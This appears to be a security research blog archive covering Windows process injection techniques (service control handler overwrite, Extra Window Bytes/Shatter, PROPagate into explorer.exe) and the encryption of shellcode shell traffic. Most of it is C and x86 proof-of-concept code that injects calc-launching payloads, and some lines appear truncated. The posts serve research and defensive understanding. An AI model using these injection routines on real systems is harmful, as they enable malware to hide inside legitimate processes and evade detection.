```DWORD HandlerEx(DWORD dwControl, DWORD dwEventType,
LPVOID lpEventData, LPVOID lpContext)
{
WinExec_t pWinExec;
DWORD     szWinExec[2],
szCalc[2];

// WinExec
szWinExec[0]=0x456E6957;
szWinExec[1]=0x00636578;

// calc
szCalc[0] = 0x636C6163;
szCalc[1] = 0;

if(pWinExec != NULL) {
pWinExec((LPSTR)szCalc, SW_SHOW);
}
return NO_ERROR;
}
```

### Internal Dispatch Entry

Before one can trigger execution of a payload, one must locate an Internal Dispatch Entry (IDE) that contains information about a service, including the control handler that can be overwritten. The reason it can be overwritten is because it’s stored on the heap. The following structure is undocumented.

```typedef struct _INTERNAL_DISPATCH_ENTRY {
LPWSTR                  ServiceName;
LPWSTR                  ServiceRealName;
LPSERVICE_MAIN_FUNCTION ServiceStartRoutine;
LPHANDLER_FUNCTION_EX   ControlHandler;
HANDLE                  StatusHandle;
DWORD                   ServiceFlags;
DWORD                   Tag;
DWORD                   dwReserved;
} INTERNAL_DISPATCH_ENTRY, *PINTERNAL_DISPATCH_ENTRY;
```
• ServiceName
• ServiceRealName
• These fields point to a UNICODE string describing the service. Once the string has been located in memory, it’s used to locate the IDE for the service by comparing these two fields. If they are both equal, we assume we’ve found a valid IDE. Additional checks may be required.

• ServiceStartRoutine
• This is the first function called whenever the service starts up, it’s responsible for registering the service control handler.

• ControlHandler
• This address will be replaced with the address of a payload before calling the ControlService API.

• ServiceFlags
• The control handler dispatcher will check this value to determine what service controls the handler function will accept. To enable code injection, it must be changed to SERVICE_CONTROL_INTERROGATE, otherwise injection fails.

### Full function

The bulk of the code involves locating the Internal Dispatch Entry (IDE), and that isn’t included here due to complexity. Once the IDE has been found, injection involves overwriting the ControlHandler pointer with a pointer to the payload, changing the ServiceFlags, writing back to memory and triggering execution via the ControlService API.

```VOID CtrlSvc(PSERVICE_ENTRY se, LPVOID payload, DWORD payloadSize) {
SIZE_T                  wr;
SC_HANDLE               hm, hs;
INTERNAL_DISPATCH_ENTRY ide;
HANDLE                  hp;
LPVOID                  pl;
SERVICE_STATUS          ss;

// 1. Open the service control manager
hm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

// 2. Open the target service
hs = OpenService(hm, se->service, SERVICE_INTERROGATE);

// 3. Open the target process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, se->pid);

// 4. Allocate RWX memory for payload

// 5. Write the payload to the target process

// 6. Copy the existing entry to local memory
CopyMemory(&ide, &se->ide, sizeof(ide));

// 7. Update service flags and ControlHandler
ide.ControlHandler = pl;
ide.ServiceFlags   = SERVICE_CONTROL_INTERROGATE;

// 8. Write the updated IDE to the target process
&ide, sizeof(ide), &wr);

// 9. Trigger execution of the payload
ControlService(hs, SERVICE_CONTROL_INTERROGATE, &ss);

// 10. Restore the original entry
&se->ide, sizeof(ide), &wr);

// 11. Free memory and close handles
MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);          // close process
CloseServiceHandle(hs);   // close service
CloseServiceHandle(hm);   // close manager
}
```

### Service to process id

Unfortunately there’s no convenient API that will return a process id for a service name. In the source code, you’ll see an elaborate way that’s not very reliable, so the following code uses Component Object Model (COM) instead as an alternative. This was written in C, so will obviously require something different for C++.

```// return a process id for service
DWORD service2pid(PWCHAR targetService) {
IWbemLocator  *loc = NULL;
IWbemServices *svc = NULL;
DWORD         pid  = 0;
HRESULT       hr;

// initialize COM

if (SUCCEEDED(hr)) {
// setup security
hr = CoInitializeSecurity(
NULL, -1, NULL, NULL,
RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL, EOAC_NONE, NULL);

if (SUCCEEDED(hr)) {
// create locator
hr = CoCreateInstance (
&CLSID_WbemLocator,
0, CLSCTX_INPROC_SERVER,
&IID_IWbemLocator, (LPVOID*)&loc);

if (SUCCEEDED(hr)) {
// connect to service
hr = loc->lpVtbl->ConnectServer(
loc, L"root\\cimv2",
NULL, NULL, NULL, 0,
NULL, NULL, &svc);

if (SUCCEEDED(hr)) {
// get the process id
pid = GetServicePid(svc, targetService);

// release service object
svc->lpVtbl->Release(svc);
svc = NULL;
}
// release locator object
loc->lpVtbl->Release(loc);
loc = NULL;
}
}
CoUninitialize();
}
return pid;
}
```

The code above will initialize COM, connect to local WMI provider and then pass those parameters to GetServicePid()

```DWORD GetServicePid(IWbemServices *svc, PWCHAR targetService) {
IEnumWbemClassObject *e   = NULL;
IWbemClassObject     *obj = NULL;
ULONG                cnt;
WCHAR                service[MAX_PATH];
VARIANT              v;
HRESULT              hr;
DWORD                pid = 0;

// obtain list of Win32_Service instances
hr = svc->lpVtbl->CreateInstanceEnum(svc,
L"Win32_Service",
WBEM_FLAG_RETURN_IMMEDIATELY |
WBEM_FLAG_FORWARD_ONLY, NULL, &e);

if (SUCCEEDED(hr)) {
// loop through each one
for (;;) {
cnt = 0;
hr  = e->lpVtbl->Next(e, INFINITE, 1, &obj, &cnt);

if (cnt == 0) break;

VariantInit (&v);

// get the name of service
hr = obj->lpVtbl->Get(obj, L"Name", 0, &v, NULL, NULL);

if (SUCCEEDED(hr)) {
// does it match target service name?
if (lstrcmpi(targetService, V_BSTR(&v)) == 0) {
// retrieve the process id
hr = obj->lpVtbl->Get(obj,
L"ProcessID", 0, &v, NULL, NULL);
if (SUCCEEDED(hr)) {
pid = V_UI4(&v);
break;
}
}
}
VariantClear(&v);
obj->lpVtbl->Release(obj);
}
e->lpVtbl->Release(e);
e = NULL;
}
return pid;
}
```

The above function will enumerate all instances of Win32_Service WMI class, compare the Name property with our target service name and if equal return the ProcessID property. This is a much better approach that could be used. See sc3.c for an improved version.

### Summary

Pretty much any callback function could be misused for process injection. Source code for a PoC that was tested on 64-bit versions of Windows 7 and 10 can be found here.

Posted in injection, programming, security, windows | Tagged , | 1 Comment

## Windows Process Injection: Extra Window Bytes

### Introduction

This method of injection is famous for being used in the Powerloader malware that surfaced sometime around 2013. Nobody knows for sure when it was first used for process injection because the feature exploited has been part of the Windows operating system since the late 80s or early 90s. Index zero of the Extra Window Bytes can be used to associate a class object with a window. A pointer to a class object is stored at index zero using SetWindowLongPtr and one can be retrieved using GetWindowLongPtr. The first mention of using “Shell_TrayWnd” as an injection vector can be traced to a post on the WASM forum by a user called “Indy(Clerk)”. There was some discussion about it there around 2009.

Figure 1 shows information for the “Shell_TrayWnd” class where you can see index zero of the Window Bytes has a value set.

Figure 1 : Window Spy++ information for Shell_TrayWnd

Windows Spy++ doesn’t show the full 64-bit value here, but is shown in figure 2, which displays the value returned by GetWindowLongPtr API for the same window.

Figure 2 : Full address of CTray object

### CTray class

There are only three methods in this class and no properties. The pointers to each method are read-only so we can’t simply overwrite the pointer to WndProc with a pointer to a payload. We can construct the object manually, but I think a better approach is to copy the existing object to local memory, overwrite WndProc and write the object to a new location in explorer memory. The following structure is used to define the object and pointer.

```// CTray object for Shell_TrayWnd
typedef struct _ctray_vtable {
ULONG_PTR vTable;    // change to remote memory address
ULONG_PTR Release;
ULONG_PTR WndProc;   // window procedure (change to payload)
} CTray;
```

The above structure contains everything necessary to replace the CTray object on both 32 and 64-bit systems. The size of ULONG_PTR is 4-bytes on 32-bit systems and 8-bytes on 64-bit.

The main difference between this and the code used for PROPagate is the function prototype. If we didn’t release the same number of parameters when returning to the caller, we run the risk of crashing Windows explorer or whatever window that has a class associated with it.

```LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg,
WPARAM wParam, LPARAM lParam)
{
// ignore messages other than WM_CLOSE
if (uMsg != WM_CLOSE) return 0;

WinExec_t pWinExec;
DWORD     szWinExec[2],
szCalc[2];

// WinExec
szWinExec[0]=0x456E6957;
szWinExec[1]=0x00636578;

// calc
szCalc[0] = 0x636C6163;
szCalc[1] = 0;

if(pWinExec != NULL) {
pWinExec((LPSTR)szCalc, SW_SHOW);
}
return 0;
}
```

### Full function

So here’s the function to perform the injection when provided a Position Independent Code (PIC). As with all these examples, I omit error checking to help visualize the process in steps.

```LPVOID ewm(LPVOID payload, DWORD payloadSize){
LPVOID    cs, ds;
CTray     ct;
ULONG_PTR ctp;
HWND      hw;
HANDLE    hp;
DWORD     pid;
SIZE_T    wr;

// 1. Obtain a handle for the shell tray window
hw = FindWindow("Shell_TrayWnd", NULL);

// 2. Obtain a process id for explorer.exe

// 3. Open explorer.exe
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

// 4. Obtain pointer to the current CTray object
ctp = GetWindowLongPtr(hw, 0);

(LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);

// 7. Allocate RWX memory for code

// 8. Copy the code to target process

// 9. Allocate RW memory for the new CTray object
ds = VirtualAllocEx(hp, NULL, sizeof(ct),

// 10. Write the new CTray object to remote memory
ct.vTable  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
ct.WndProc = (ULONG_PTR)cs;

WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr);

// 11. Set the new pointer to CTray object
SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);

// 12. Trigger the payload via a windows message
PostMessage(hw, WM_CLOSE, 0, 0);

// 13. Restore the original CTray object
SetWindowLongPtr(hw, 0, ctp);

// 14. Release memory and close handles
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);
}
```

### Summary

Injection methods like this against window objects usually fall under the category of “Shatter” attacks. Despite the mitigations provided by User Interface Privilege Isolation (UIPI) introduced with the release of Windows Vista, this method of injection continues to work fine on the latest build of Windows 10. You can view source code here with a payload that executes calculator.

Posted in injection, malware, programming, windows | | 1 Comment

## Windows Process Injection: PROPagate

### Introduction

In October 2017, Adam at Hexacorn published details of a process injection technique called PROPagate. In his post, he describes how any process that uses subclassed windows has the potential to be used for the execution of code without the creation of a new thread. As some of you will already know, creating a new thread in a remote process indicates suspicious activity. Remote thread creation is a common behaviour of malware attempting to deploy itself inside the memory space of a legitimate process for the purpose of evading detection.

PROPagate works by way of inserting a new subclass header or modifying an existing one that contains among other information a callback function that can be controlled from another process. A subclassed window can be updated using the SetProp API, and is very similar to using SetWindowLong/SetWindowLongPtr APIs to update a windows callback procedure. In this post, we will examine how PROPagate works, and what makes it more appealing for threat actors to use over other injection methods. As of August 2018, the method has been so far detected in Smoke Loader and the RIG Exploit Kit.

### Enumerating windows

Windows Explorer uses subclassing extensively, and normally runs with a medium integrity level that makes the process space accessible to the logged on user without any privileges enabled. For these reasons, Windows explorer is far more likely to be the target of this injection method. A threat actor still needs to locate a valid subclass header, and thus requires discovery of existing window objects and their properties before injection into windows explorer can occur.

Microsoft Windows provides a number of simple API that can be used to discover window objects. We have the following API available to us.

• EnumWindows/EnumDesktopWindows
• EnumChildWindows
• EnumProps/EnumPropsEx

We can locate a valid subclass header in explorer.exe using the following steps:

1. Invoke EnumWindows
2. From EnumWindowsProc invoke EnumChildWindows
3. From EnumChildWindowsProc invoke EnumProps
4. From EnumPropsProc invoke GetProp on the window handle with “UxSubclassInfo”
5. If a valid handle is returned by GetProp, consider it a potential vector for injection

The following snippet of code is taken from enumprop that simply gathers a list of subclassed windows and displays information about them in a console window.

```typedef struct _win_props_t {
DWORD  dwPid;
WCHAR  ImageName[MAX_PATH];
HANDLE hProperty;
HWND   hParentWnd;
HWND   hChildWnd;
WCHAR  ParentClassName[MAX_PATH];
WCHAR  ChildClassName[MAX_PATH];
} WINPROPS, *PWINPROPS;

// callback for property list
BOOL CALLBACK PropEnumProc(HWND hwnd,
LPCTSTR lpszString, HANDLE hData)
{
WINPROPS wp;
HANDLE   hp;

hp = GetProp(hwnd, L"UxSubclassInfo");
if(hp==NULL) hp = GetProp(hwnd, L"CC32SubclassInfo");

if(hp != NULL) {
ZeroMemory(&wp, sizeof(wp));

wp.hProperty  = hp;
wp.hChildWnd  = hwnd;
wp.hParentWnd = GetParent(hwnd);

GetClassName(wp.hParentWnd, wp.ParentClassName, MAX_PATH);
GetClassName(hwnd, wp.ChildClassName, MAX_PATH);
GetProcessImageName(wp.dwPid, wp.ImageName, MAX_PATH);

if(!IsEntry(&wp)) {
windows.push_back(wp);
}
}
return TRUE;
}

// callback for child windows
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
EnumProps(hwnd, PropEnumProc);

return TRUE;
}

// callback for parent windows
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
EnumChildWindows(hwnd, EnumChildProc, 0);
EnumProps(hwnd, PropEnumProc);

return TRUE;
}
```

The following screenshot is an example of output generated by enumprop on a 64-bit version of Windows 7.

As you can see, there are many potential classes that could be exploited for code execution, however, we should really only need to use one of those listed. A universal parent and child class that should work for both Windows 7 and 10 is “Progman” and “SHELLDLL_DefView”

The sub class header values shown in the screenshot are just virtual memory addresses inside the process space of Windows explorer.

Windows keeps track of callback procedures for sub-classed windows through a set of structures defined below. The CallArray field is what we are interested in because this is where one can store a pointer to a payload in memory. Modifying the original header that was found through discovery is not required. One can simply copy the original header to a new memory location, update the CallArray field with a pointer to the payload in memory and trigger execution of the payload via a windows message.

```typedef struct _SUBCLASS_CALL {
SUBCLASSPROC pfnSubclass;    // subclass procedure
WPARAM       uIdSubclass;    // unique subclass identifier
DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, PSUBCLASS_CALL;

typedef struct _SUBCLASS_FRAME {
UINT                    uCallIndex;   // index of next callback to call
UINT                    uDeepestCall; // deepest uCallIndex on stack
struct _SUBCLASS_FRAME  *pFramePrev;  // previous subclass frame pointer
} SUBCLASS_FRAME, PSUBCLASS_FRAME;

UINT           uRefs;        // subclass count
UINT           uAlloc;       // allocated subclass call nodes
UINT           uCleanup;     // index of call node to clean up
SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
SUBCLASS_CALL  CallArray[1]; // base of packed call node array
```

### Subclass callback

The function prototype for any payload should match the callback function we are replacing, otherwise the host process might crash after execution completes. It depends on the calling convention and number of parameters passed to the callback function.

```typedef LRESULT (CALLBACK *SUBCLASSPROC)(
HWND      hWnd,
UINT      uMsg,
WPARAM    wParam,
LPARAM    lParam,
UINT_PTR  uIdSubclass,
DWORD_PTR dwRefData);
```

The payload requires the same number of parameters and calling convention. In addition to this, if we don’t want the function called multiple times, we should only execute based on the windows message passed in. Here, I use WM_CLOSE, but the message itself is irrelevant because it is never processed. It’s merely a way of knowing if this is the first call to the function.

```LRESULT CALLBACK SubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam,
LPARAM lParam, UINT_PTR uIdSubclass, DWORD_PTR dwRefData)
{
// ignore messages other than WM_CLOSE
if (uMsg != WM_CLOSE) return 0;

WinExec_t pWinExec;
DWORD     szWinExec[2],
szCalc[2];

// WinExec
szWinExec[0]=0x456E6957;
szWinExec[1]=0x00636578;

// calc
szCalc[0] = 0x636C6163;
szCalc[1] = 0;

if(pWinExec != NULL) {
pWinExec((LPSTR)szCalc, SW_SHOW);
}
return 0;
}
```

Smoke Loader in particular appears to use a combination of WM_NOTIFY and WM_PAINT to trigger the payload, but this isn’t necessary and likely results in the code being executed multiple times. If it’s not executed multiple times, then I can only assume it uses a mutex name or something else to prevent this.

### Full function

Below is the full code to inject a Position Independent Code (PIC) into explorer.exe. It works for both Windows 7 and 10, but performs no error checking so it may cause explorer.exe to crash or some other unexpected behaviour.

```VOID propagate(LPVOID payload, DWORD payloadSize) {
HANDLE          hp, p;
DWORD           id;
HWND            pwh, cwh;
LPVOID          psh, pfnSubclass;
SIZE_T          rd,wr;

// 1. Obtain the parent window handle
pwh = FindWindow(L"Progman", NULL);

// 2. Obtain the child window handle
cwh = FindWindowEx(pwh, NULL, L"SHELLDLL_DefView", NULL);

// 3. Obtain the handle of subclass header
p = GetProp(cwh, L"UxSubclassInfo");

// 4. Obtain the process id for the explorer.exe

// 5. Open explorer.exe
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 7. Allocate RW memory for a new subclass header
psh = VirtualAllocEx(hp, NULL, sizeof(sh),

// 8. Allocate RWX memory for the payload

// 9. Write the payload to memory
WriteProcessMemory(hp, pfnSubclass,

//    back to process in new area of memory
sh.CallArray[0].pfnSubclass = (SUBCLASSPROC)pfnSubclass;
WriteProcessMemory(hp, psh, &sh, sizeof(sh), &wr);

// 11. update the subclass procedure with SetProp
SetProp(cwh, L"UxSubclassInfo", psh);

// 12. Trigger the payload via a windows message
PostMessage(cwh, WM_CLOSE, 0, 0);

// 13. Restore original subclass header
SetProp(cwh, L"UxSubclassInfo", p);

// 14. free memory and close handles
VirtualFreeEx(hp, psh, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, pfnSubclass, 0, MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);
}
```

### Summary

Not all processes will have a subclassed window, so this method of injection is for the most part isolated to explorer.exe. A PoC that executes calculator can be found here.

## Shellcode: Encrypting traffic

### Introduction

This will be a quick post on using encryption in a Position Independent Code (PIC) that communicates over TCP. I’ll be using the synchronous shells for Linux as examples, so just to recap, read the following posts for more details about the shellcodes.

You may also wish to look at some of the encryption algorithms mentioned here.

### Disclaimer

I’m neither a cryptographer nor engineer, so what I use in these shellcodes to encrypt TCP traffic should not be used to protect data (obviously).

### Protocols and libraries

When we think about cryptographic protocols, our first thought might be Transport Layer Security (TLS), because it’s the industry standard for browsing the web securely. One might also consider Secure Shell (SSH) or Internet Protocol Security (IPSec). However, none of these protocols are suitable for resource constrained environments due to the underlying algorithms used. Cryptographic hash functions like SHA-2 and block ciphers like Blowfish were never designed for low resource electronic devices such as Radio-frequency identification (RFID) chips.

In April 2018, NIST initiated a process to standardize lightweight cryptographic algorithms for the IoT industry. This process will take several years to complete, but of course the industry will not wait before then and this will inevitably lead to insecure products being exposed to the internet. Some cryptographers took the initiative and proposed their own protocols using existing algorithms suitable for low resource devices, two of which are BLINKER and STROBE. Libraries suitable for resource constrained environments are LibHydrogen and MonoCypher

### Block ciphers

There are many block ciphers, but the 128-bit version of the Advanced Encryption Standard (AES) in Galois Counter Mode (GCM) is probably the most popular for protecting online traffic. Even though AES-128 can be implemented in 205 bytes of x86 assembly, there are alternatives that might be more ideal for a shellcode. The following table lists a number of block ciphers that were examined. They are in no particular order.

Cipher Block (bits) Key (bits) x86 assembly (bytes)
Speck 64 128 64
XTEA 64 128 72
CHAM 128 128 128
SIMECK 64 128 97
AES 128 128 205
RC5 64 128 120
RC6 128 256 168
NOEKEON 128 128 152
LEA 128 128 136

There’s a good selection of ciphers there, but they still require a mode of encryption like Counter (CTR) and authentication. The most suitable Message Authentication Code (MAC) is LightMAC because it can use the same block cipher used for encryption.

### Stream ciphers

Another popular combination of algorithms for authenticated encryption as an alternative to AES-GCM is ChaCha20 and Poly1305, but an implementation of ChaCha20 is ~200 bytes while Poly1305 is ~330 bytes. Although Poly1305 is more compact than HMAC-SHA2, it’s still too much.

### Permutation functions

If you spend enough time examining various cryptographic algorithms, you eventually realize a cryptographic permutation function is all that’s required to construct stream ciphers, block ciphers, authenticated modes of encryption, cryptographic hash functions and random number generators. The following table lists three functions that were examined.

Function State (bits) x86 assembly (bytes)
Gimli 384 112
Xoodoo 384 186
Keccak-f[200,18] 200 210

From this, Gimli was selected to be used for encryption, simply because it was the smallest of the three and can be used to construct everything required to encrypt traffic.

### XOR Cipher

Just for fun, let’s implement a simple XOR operation of the data stream. Below is a screenshot of some commands sent from a windows VM to a Linux VM running the shellcode without any encryption.

Capturing the traffic between the two hosts, we see the following in the TCP stream.

Add a small bit of code to the x86 assembly shellcode to perform an 8-bit XOR operation.

```;
xor    esi, esi          ; esi = 0
mov    ecx, edi          ; ecx = buf
cdq                      ; edx = 0
mov    dl, BUFSIZ        ; edx = BUFSIZ
pop    eax
int    0x80

; encrypt/decrypt buffer
xchg   eax, ecx
xor_loop:
xor    byte[eax+ecx-1], XOR_KEY
loop   xor_loop

; write(w, buf, len);
xchg   eax, edx          ; edx = len
mov    al, SYS_write
pop    ebx               ; s or in[1]
int    0x80
jmp    poll_wait
```

Performing the same commands in a new session, it’s no longer readable. I’m using a hexdump here because it’s easier to visualize when a command is sent and when the results are received.

Of course, an 8-bit key is insufficient to defend against recovery of the plaintext, and the following screenshot shows Cyberchef brute forcing the key.

### Speck and LightMAC

Initially, I used the following code for authenticated encryption of packets. It uses Encrypt-then-MAC (EtM), that is supposed to be more secure than other approaches; MAC-then-Encrypt (MtE) or Encrypt-and-MAC (E&M)

```bits 32

%define SPECK_RNDS    27
%define N              8
%define K             16
; *****************************************
; Light MAC parameters based on SPECK64-128
;
; N = 64-bits
; K = 128-bits
;
%define COUNTER_LENGTH N/2  ; should be <= N/2
%define BLOCK_LENGTH   N  ; equal to N
%define TAG_LENGTH     N  ; >= 64-bits && <= N
%define BC_KEY_LENGTH  K  ; K

%define ENCRYPT_BLK speck_encrypt
%define GET_MAC lightmac
%define LIGHTMAC_KEY_LENGTH BC_KEY_LENGTH*2 ; K*2

%define k0 edi
%define k1 ebp
%define k2 ecx
%define k3 esi

%define x0 ebx
%define x1 edx

; esi = IN data
; ebp = IN key

speck_encrypt:

push    esi            ; save M

lodsd                  ; x0 = x->w[0]
xchg    eax, x0
lodsd                  ; x1 = x->w[1]
xchg    eax, x1

mov     esi, ebp       ; esi = key
lodsd
xchg    eax, k0        ; k0 = key[0]
lodsd
xchg    eax, k1        ; k1 = key[1]
lodsd
xchg    eax, k2        ; k2 = key[2]
lodsd
xchg    eax, k3        ; k3 = key[3]
xor     eax, eax       ; i = 0
spk_el:
; x0 = (ROTR32(x0, 8) + x1) ^ k0;
ror     x0, 8
xor     x0, k0
; x1 = ROTL32(x1, 3) ^ x0;
rol     x1, 3
xor     x1, x0
; k1 = (ROTR32(k1, 8) + k0) ^ i;
ror     k1, 8
xor     k1, eax
; k0 = ROTL32(k0, 3) ^ k1;
rol     k0, 3
xor     k0, k1
xchg    k3, k2
xchg    k3, k1
; i++
inc     eax
cmp     al, SPECK_RNDS
jnz     spk_el

pop     edi
xchg    eax, x0        ; x->w[0] = x0
stosd
xchg    eax, x1        ; x->w[1] = x1
stosd
ret

; edx = IN len
; ebx = IN msg
; ebp = IN key
; edi = OUT tag
lightmac:
mov      ecx, edx
xor      edx, edx
pushad                 ; allocate N-bytes for M
; zero initialize T
mov     [edi+0], edx   ; t->w[0] = 0;
mov     [edi+4], edx   ; t->w[1] = 0;
; while we have msg data
lmx_l0:
mov     esi, esp       ; esi = M
jecxz   lmx_l2         ; exit loop if msglen == 0
lmx_l1:
mov     al, [ebx]      ; al = *data++
inc     ebx
mov     [esi+edx+COUNTER_LENGTH], al
inc     edx            ; idx++
; M filled?
cmp     dl, BLOCK_LENGTH - COUNTER_LENGTH
; --msglen
loopne  lmx_l1
jne     lmx_l2
; add S counter in big endian format
inc     dword[esp+_edx]; ctr++
mov     eax, [esp+_edx]
; reset index
cdq                    ; idx = 0
bswap   eax            ; m.ctr = SWAP32(ctr)
mov     [esi], eax
; encrypt M with E using K1
call    ENCRYPT_BLK
; update T
lodsd                  ; t->w[0] ^= m.w[0];
xor     [edi+0], eax
lodsd                  ; t->w[1] ^= m.w[1];
xor     [edi+4], eax
jmp     lmx_l0         ; keep going
lmx_l2:
mov     byte[esi+edx+COUNTER_LENGTH], 0x80
xchg    esi, edi       ; swap T and M
lmx_l3:
; update T with any msg data remaining
mov     al, [edi+edx+COUNTER_LENGTH]
xor     [esi+edx], al
dec     edx
jns     lmx_l3
; encrypt T with E using K2
call    ENCRYPT_BLK
popad                  ; release memory for M
ret

; IN: ebp = global memory, edi = msg, ecx = enc flag, edx = msglen
; OUT: -1 or length of data encrypted/decrypted
encrypt:
push    -1
pop     eax            ; set return value to -1
lea     ebp, [ebp+@ctx] ; ebp crypto ctx
mov     ebx, edi       ; ebx = msg
pushad                 ; allocate 8-bytes for tag+strm
mov     edi, esp       ; edi = tag
; if (enc) {
;   verify tag + decrypt
jecxz   enc_l0
; msglen -= TAG_LENGTH;
sub     edx, TAG_LENGTH
jle     enc_l5         ; return -1 if msglen <= 0
mov     [esp+_edx], edx
; GET_MAC(ctx, msg, msglen, mac);
call    GET_MAC
; memcmp(mac, &msg[msglen], TAG_LENGTH)
lea     esi, [ebx+edx] ; esi = &msg[msglen]
cmpsd
jnz     enc_l5         ; not equal? return -1
cmpsd
jnz     enc_l5         ; ditto
; MACs are equal
; zero the MAC
xor     eax, eax
mov     [esi-4], eax
mov     [esi-8], eax
enc_l0:
mov     edi, esp
test    edx, edx       ; exit if (msglen == 0)
jz      enc_lx
; memcpy (strm, ctx->e_ctr, BLOCK_LENGTH);
mov     esi, [esp+_ebp]; esi = ctx->e_ctr
push    edi
movsd
movsd
mov     ebp, esi
pop     esi
; ENCRYPT_BLK(ctx->e_key, &strm);
call    ENCRYPT_BLK
mov     cl, BLOCK_LENGTH
; r=(len > BLOCK_LENGTH) ? BLOCK_LENGTH : len;
enc_l2:
lodsb                  ; al = *strm++
xor     [ebx], al      ; *msg ^= al
inc     ebx            ; msg++
dec     edx
loopnz  enc_l2         ; while (!ZF && --ecx)
mov     cl, BLOCK_LENGTH
enc_l3:                      ; do {
; update counter
mov     ebp, [esp+_ebp]
inc     byte[ebp+ecx-1]
loopz   enc_l3         ; } while (ZF && --ecx)
jmp     enc_l0
enc_lx:
; encrypting? add MAC of ciphertext
dec     dword[esp+_ecx]
mov     edx, [esp+_edx]
jz      enc_l4
mov     edi, ebx
mov     ebx, [esp+_ebx]
mov     ebp, [esp+_ebp]
; GET_MAC(ctx, buf, buflen, msg);
call    GET_MAC
; msglen += TAG_LENGTH;
enc_l4:
; return msglen;
mov     [esp+32+_eax], edx
enc_l5:
ret
```

This works of course, but it requires a protocol. The receiver needs to know in advance how much data is being sent before it can authenticate the data. The encrypted length needs to be sent first, followed by the encrypted data. That’ll work, but hangon! this is a shellcode! Why so complicated? Let’s just use RC4! Let’s not!

### Gimli

In an attempt to replicate the behaviour of RC4 using Gimli, I wrote the following bit of code. The permute function is essentially Gimli.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)

void permute(void*p){
uint32_t i,r,t,x,y,z,*s=p;

for(r=24;r>0;--r){
F(4)
x=R(s[i],24),
y=R(s[4+i],9),
z=s[8+i],
s[8+i]=x^(z+z)^((y&z)*4),
s[4+i]=y^x^((x|z)*2),
s[i]=z^y^((x&y)*8);
t=r&3;
if(!t)
X(0,1),X(2,3),
*s^=0x9e377900|r;
if(t==2)X(0,2),X(1,3);
}
}

typedef struct _crypt_ctx {
uint32_t idx;
int      fdr, fdw;
uint8_t  s[48];
uint8_t  buf[BUFSIZ];
} crypt_ctx;

uint8_t gf_mul(uint8_t x) {
return (x << 1) ^ ((x >> 7) * 0x1b);
}

// initialize crypto context
void init_crypt(crypt_ctx *c, int r, int w, void *key) {
int i;

c->fdr = r; c->fdw = w;

for(i=0;i<48;i++) {
c->s[i] = ((uint8_t*)key)[i % 16] ^ gf_mul(i);
}
permute(c->s);
c->idx = 0;
}

// encrypt or decrypt buffer
void crypt(crypt_ctx *c) {
int i, len;

// read from socket or stdout

// encrypt/decrypt
for(i=0;i<len;i++) {
if(c->idx >= 32) {
permute(c->s);
c->idx = 0;
}
c->buf[i] ^= c->s[c->idx++];
}
// write to socket or stdin
write(c->fdw, c->buf, len);
}
```

To use this in the Linux shell, we declare two seperate crypto contexts for input and output along with a 128-bit static key.

```// using a static 128-bit key
crypt_ctx          *c, c1, c2;

// echo -n top_secret_key | openssl md5 -binary -out key.bin
// xxd -i key.bin

uint8_t key[] = {
0x4f, 0xef, 0x5a, 0xcc, 0x15, 0x78, 0xf6, 0x01,
0xee, 0xa1, 0x4e, 0x24, 0xf1, 0xac, 0xf9, 0x49 };
```

Before entering the main polling loop, we need to initialize each context with a read and write file descriptor. This helps save a bit on code. This could be inlined when adding a descriptor to monitor.

```//
// c1 is for reading from socket and writing to stdin
init_crypt(&c1, s, in[1], key);

// c2 is for reading from stdout and writing to socket
init_crypt(&c2, out[0], s, key);

// now loop until user exits or some other error
for (;;) {
r = epoll_wait(efd, &evts, 1, -1);

// error? bail out
if (r<=0) break;

// not input? bail out
if (!(evts.events & EPOLLIN)) break;

fd = evts.data.fd;

c = (fd == s) ? &c1 : &c2;

crypt(c);
}
```

### Summary

Recovery of the shellcode would lead to recovery of the plaintext since it uses a static key for encryption. To prevent this, one would need to use a key exchange protocol like Diffie-Hellman. 😀

Posted in arm, assembly, cryptography, linux, programming, security, shellcode | Tagged , , , | Leave a comment